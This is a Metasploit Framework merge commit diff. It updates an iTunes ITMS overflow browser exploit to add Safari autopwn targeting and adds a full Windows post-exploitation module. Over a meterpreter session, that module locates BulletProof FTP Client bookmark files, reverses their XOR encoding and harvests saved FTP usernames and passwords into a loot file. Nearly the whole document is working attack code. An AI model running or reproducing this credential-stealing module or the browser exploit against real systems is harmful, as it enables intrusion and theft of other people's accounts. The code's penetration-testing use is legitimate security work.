Merge branch 'master' of git://github.com/rapid7/metasploit-framework
commit
b3291c0329
|
@ -13,6 +13,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
# no popup required to visit itms:// URLs in Safari, so throw it in BAP
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::SAFARI,
|
||||
:ua_maxver => "4.1",
|
||||
:ua_minver => "4.0.5",
|
||||
:javascript => false,
|
||||
:rank => NormalRanking,
|
||||
:os_name => OperatingSystems::MAC_OSX
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
|
||||
|
@ -93,9 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return String(<<-EOS)
|
||||
<html><head><title>iTunes loading . . .</title></head>
|
||||
<body>
|
||||
<script>document.location.assign("#{itms_base_url}");</script>
|
||||
<p>iTunes should open automatically, but if it doesn't, click to
|
||||
<a href="#{itms_base_url}">continue</a>.</p>a
|
||||
<a href="#{itms_base_url}">continue</a>.</p>
|
||||
<script>document.location.assign("#{itms_base_url}");</script>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
|
|
|
@ -0,0 +1,320 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/post/file'
|
||||
require 'msf/core/post/windows/user_profiles'
|
||||
require 'msf/core/post/windows/registry'
|
||||
require 'msf/core/auxiliary/report'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::UserProfiles
|
||||
include Msf::Post::Windows::Registry
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Windows Gather BulletProof FTP Client Saved Password Extraction',
|
||||
'Description' => %q{
|
||||
This module extracts information from BulletProof FTP Bookmarks files and store
|
||||
retrieved credentials in the database.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'juan vazquez'],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ]
|
||||
))
|
||||
end
|
||||
|
||||
class BookmarksParser
|
||||
|
||||
# Array of entries found after parsing a Bookmarks File
|
||||
attr_accessor :entries
|
||||
|
||||
def initialize(contents)
|
||||
@xor_key = nil
|
||||
@contents_bookmark = contents
|
||||
@entries = []
|
||||
end
|
||||
|
||||
def parse_bookmarks
|
||||
if not parse_header
|
||||
return
|
||||
end
|
||||
|
||||
while @contents_bookmark.length > 0
|
||||
parse_entry
|
||||
@contents_bookmark.slice!(0, 25) # 25 null bytes between entries
|
||||
end
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
def low_dword(value)
|
||||
return Rex::Text.pack_int64le(value).unpack("VV")[0]
|
||||
end
|
||||
|
||||
def high_dword(value)
|
||||
return Rex::Text.pack_int64le(value).unpack("VV")[1]
|
||||
end
|
||||
|
||||
def low_byte(value)
|
||||
return [value].pack("V").unpack("C*")[0]
|
||||
end
|
||||
|
||||
def generate_xor_key
|
||||
# Magic numbers 0x100 and 0x8088405 is obtained from bpftpclient.exe static analysis:
|
||||
#.text:007B13C1 mov eax, 100h
|
||||
# ... later
|
||||
#.text:0040381F imul edx, dword_7EF008[ebx], 8088405h
|
||||
#.text:00403829 inc edx
|
||||
#.text:0040382A mov dword_7EF008[ebx], edx
|
||||
#.text:00403830 mul edx
|
||||
temp = @xor_key * 0x8088405
|
||||
temp = low_dword(temp)
|
||||
temp = temp + 1
|
||||
@xor_key = temp
|
||||
result = temp * 0x100
|
||||
result = high_dword(result)
|
||||
result = low_byte(result)
|
||||
return result
|
||||
end
|
||||
|
||||
def decrypt(encrypted)
|
||||
length = encrypted.unpack("C")[0]
|
||||
return "" if length.nil?
|
||||
@xor_key = length
|
||||
encrypted = encrypted[1..length]
|
||||
return "" if encrypted.length != length
|
||||
decrypted = ""
|
||||
encrypted.unpack("C*").each { |byte|
|
||||
key = generate_xor_key
|
||||
decrypted << [byte ^ key].pack("C")
|
||||
}
|
||||
return decrypted
|
||||
end
|
||||
|
||||
def parse_object
|
||||
object_length = @contents_bookmark[0,1].unpack("C")[0]
|
||||
object = @contents_bookmark[0, object_length + 1 ]
|
||||
@contents_bookmark.slice!(0, object_length+1)
|
||||
content = decrypt(object)
|
||||
return content
|
||||
end
|
||||
|
||||
def parse_entry
|
||||
site_name = parse_object
|
||||
site_address = parse_object
|
||||
login = parse_object
|
||||
remote_dir = parse_object
|
||||
local_dir = parse_object
|
||||
port = parse_object
|
||||
password = parse_object
|
||||
|
||||
@entries << {
|
||||
:site_name => site_name,
|
||||
:site_address => site_address,
|
||||
:login => login,
|
||||
:remote_dir => remote_dir,
|
||||
:local_dir => local_dir,
|
||||
:port => port,
|
||||
:password => password
|
||||
}
|
||||
end
|
||||
|
||||
def parse_header
|
||||
signature = parse_object
|
||||
if not signature.eql?("BPSitelist")
|
||||
return false # Error!
|
||||
end
|
||||
|
||||
unknown = @contents_bookmark.slice!(0, 4) # "\x01\x00\x00\x00"
|
||||
return false unless unknown == "\x01\x00\x00\x00"
|
||||
|
||||
return true
|
||||
end
|
||||
end
|
||||
|
||||
def check_installation
|
||||
bullet_reg = "HKCU\\SOFTWARE\\BulletProof Software"
|
||||
bullet_reg_ver = registry_enumkeys("#{bullet_reg}")
|
||||
|
||||
return false if bullet_reg_ver.nil?
|
||||
|
||||
bullet_reg_ver.each { |key|
|
||||
if key =~ /BulletProof FTP Client/
|
||||
return true
|
||||
end
|
||||
}
|
||||
return false
|
||||
end
|
||||
|
||||
def get_bookmarks(path)
|
||||
|
||||
bookmarks = []
|
||||
|
||||
if not directory?(path)
|
||||
return bookmarks
|
||||
end
|
||||
|
||||
session.fs.dir.foreach(path) do |entry|
|
||||
if directory?("#{path}\\#{entry}") and entry != "." and entry != ".."
|
||||
bookmarks.concat(get_bookmarks("#{path}\\#{entry}"))
|
||||
elsif entry =~ /bpftp.dat/ and file?("#{path}\\#{entry}")
|
||||
vprint_good("BulletProof FTP Bookmark file found at #{path}\\#{entry}")
|
||||
bookmarks << "#{path}\\#{entry}"
|
||||
end
|
||||
end
|
||||
return bookmarks
|
||||
end
|
||||
|
||||
def check_bulletproof(user_dir)
|
||||
session.fs.dir.foreach(user_dir) do |dir|
|
||||
if dir =~ /BulletProof Software/
|
||||
vprint_status("BulletProof Data Directory found at #{user_dir}\\#{dir}")
|
||||
return "#{user_dir}\\#{dir}"#"\\BulletProof FTP Client\\2010\\sites\\Bookmarks"
|
||||
end
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
def report_findings(entries)
|
||||
|
||||
if session.db_record
|
||||
source_id = session.db_record.id
|
||||
else
|
||||
source_id = nil
|
||||
end
|
||||
|
||||
entries.each{ |entry|
|
||||
@credentials << [
|
||||
entry[:site_name],
|
||||
entry[:site_address],
|
||||
entry[:port],
|
||||
entry[:login],
|
||||
entry[:password],
|
||||
entry[:remote_dir],
|
||||
entry[:local_dir]
|
||||
]
|
||||
|
||||
report_auth_info(
|
||||
:host => entry[:site_address],
|
||||
:port => entry[:port],
|
||||
:proto => 'tcp',
|
||||
:sname => 'ftp',
|
||||
:user => entry[:login],
|
||||
:pass => entry[:password],
|
||||
:ptype => 'password',
|
||||
:source_id => source_id,
|
||||
:source_type => "exploit"
|
||||
)
|
||||
}
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
print_status("Checking if BulletProof FTP Client is installed...")
|
||||
if not check_installation
|
||||
print_error("BulletProof FTP Client isn't installed")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Searching BulletProof FTP Client Data directories...")
|
||||
# BulletProof FTP Client 2010 uses User Local Settings to store bookmarks files
|
||||
profiles = grab_user_profiles()
|
||||
bullet_paths = []
|
||||
profiles.each do |user|
|
||||
next if user['LocalAppData'] == nil
|
||||
bulletproof_dir = check_bulletproof(user['LocalAppData'])
|
||||
bullet_paths << bulletproof_dir if bulletproof_dir
|
||||
end
|
||||
|
||||
print_status("Searching BulletProof FTP Client installation directory...")
|
||||
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
|
||||
program_files_x86 = expand_path('%ProgramFiles(X86)%')
|
||||
if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
|
||||
program_files = program_files_x86 #x64
|
||||
else
|
||||
program_files = expand_path('%ProgramFiles%') #x86
|
||||
end
|
||||
session.fs.dir.foreach(program_files) do |dir|
|
||||
if dir =~ /BulletProof FTP Client/
|
||||
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")
|
||||
bullet_paths << "#{program_files}\\#{dir}"
|
||||
end
|
||||
end
|
||||
|
||||
if bullet_paths.empty?
|
||||
print_error("BulletProof FTP Client directories not found.")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Searching for BulletProof FTP Client Bookmarks files...")
|
||||
bookmarks = []
|
||||
bullet_paths.each { |path|
|
||||
bookmarks.concat(get_bookmarks(path))
|
||||
}
|
||||
if bookmarks.empty?
|
||||
print_error("BulletProof FTP Client Bookmarks files not found.")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Searching for connections data on BulletProof FTP Client Bookmarks files...")
|
||||
entries = []
|
||||
bookmarks.each { |bookmark|
|
||||
p = BookmarksParser.new(read_file(bookmark))
|
||||
p.parse_bookmarks
|
||||
if p.entries.length > 0
|
||||
entries.concat(p.entries)
|
||||
else
|
||||
vprint_error("Entries not found on #{bookmark}")
|
||||
end
|
||||
}
|
||||
|
||||
if entries.empty?
|
||||
print_error("BulletProof FTP Client Bookmarks not found.")
|
||||
return
|
||||
end
|
||||
|
||||
# Report / Show findings
|
||||
@credentials = Rex::Ui::Text::Table.new(
|
||||
'Header' => "BulletProof FTP Client Bookmarks",
|
||||
'Indent' => 1,
|
||||
'Columns' =>
|
||||
[
|
||||
"Site Name",
|
||||
"Site Address",
|
||||
"Port",
|
||||
"Login",
|
||||
"Password",
|
||||
"Remote Dir",
|
||||
"Local Dir"
|
||||
])
|
||||
|
||||
report_findings(entries)
|
||||
results = @credentials.to_s
|
||||
|
||||
print_line("\n" + results + "\n")
|
||||
|
||||
if not @credentials.rows.empty?
|
||||
p = store_loot(
|
||||
'bulletproof.creds',
|
||||
'text/plain',
|
||||
session,
|
||||
@credentials.to_csv,
|
||||
'bulletproof.creds.csv',
|
||||
'BulletProof Credentials'
|
||||
)
|
||||
print_status("Data stored in: #{p.to_s}")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue